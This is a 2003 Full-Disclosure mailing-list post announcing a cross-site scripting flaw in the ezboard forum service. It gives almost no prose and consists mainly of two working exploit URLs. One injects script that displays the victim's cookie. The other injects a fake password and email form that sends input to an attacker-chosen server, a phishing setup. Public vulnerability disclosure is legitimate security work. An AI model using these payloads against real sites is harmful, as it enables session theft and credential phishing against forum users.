[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[Full-Disclosure] XSS in ezboard

To: full-disclosure@xxxxxxxxxxxxxxxx
Subject: [Full-Disclosure] XSS in ezboard
From: "David F. Madrid" <idoru@xxxxxxxxxxxxxxxx>
Date: Sun, 31 Aug 2003 19:05:37 +0200

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1


Issue : Cross site scripting in ezboard

Vendor status : developers were contacted 

ezboard offers a free forum hosted at ... bla ... bla ... 
improper input validation .. bla ... bla ... script or HTML
execution ... bla ... bla  ( sorry but I don't have time
now for advisories )

Cross site scripting

http://www1.ezboard.com/invitefriends.php3?action=http://pub80.ezboard.com/ano.doTel
lAFriend&yourName=dav%22%3E%3Cscript%3Ealert(document.cookie);%3C/script%3
E

A more elaborated attack ( but still lame ) can be constructed 

http://www1.ezboard.com/invitefriends.php3?action=http://[server]&yourName=%22%3E
%3Cp%3E%3Cb%3EYou%20must%20enter%20your%20password%20to%20invite%20
a%20friend%3C/b%3E%3Cp%3E%3Cinput%20type=password%20name=pass%3E%3
Cp%3E%3Cb%3EEnter%20your%20friend%20address%3C/b%3E%3Cp%3E%3Cinput
%20type=text%20name=mail%3E%3C/form%3E%3C!--


  
Regards ,

- -- 

David F. Madrid ,
Madrid , Spain

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.3 (MingW32)

iD8DBQE/UirhFqGtZPZQ4dQRAp2eAJ46+Ewl93+zU6UUzepTnvoGiiiN9ACfUECb
yxCKp/y3KndNuKiG5OrhIwk=
=I8Q+
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Prev by Date: Re: [Full-Disclosure] Authorities eye MSBlaster suspect
Next by Date: [Full-Disclosure] DCOM/RPC story (Analogy)
Previous by thread: [Full-Disclosure] Re: OpenBSD 3.2 Kthread Madness
Next by thread: [Full-Disclosure] DCOM/RPC story (Analogy)
Index(es):
- Date
- Thread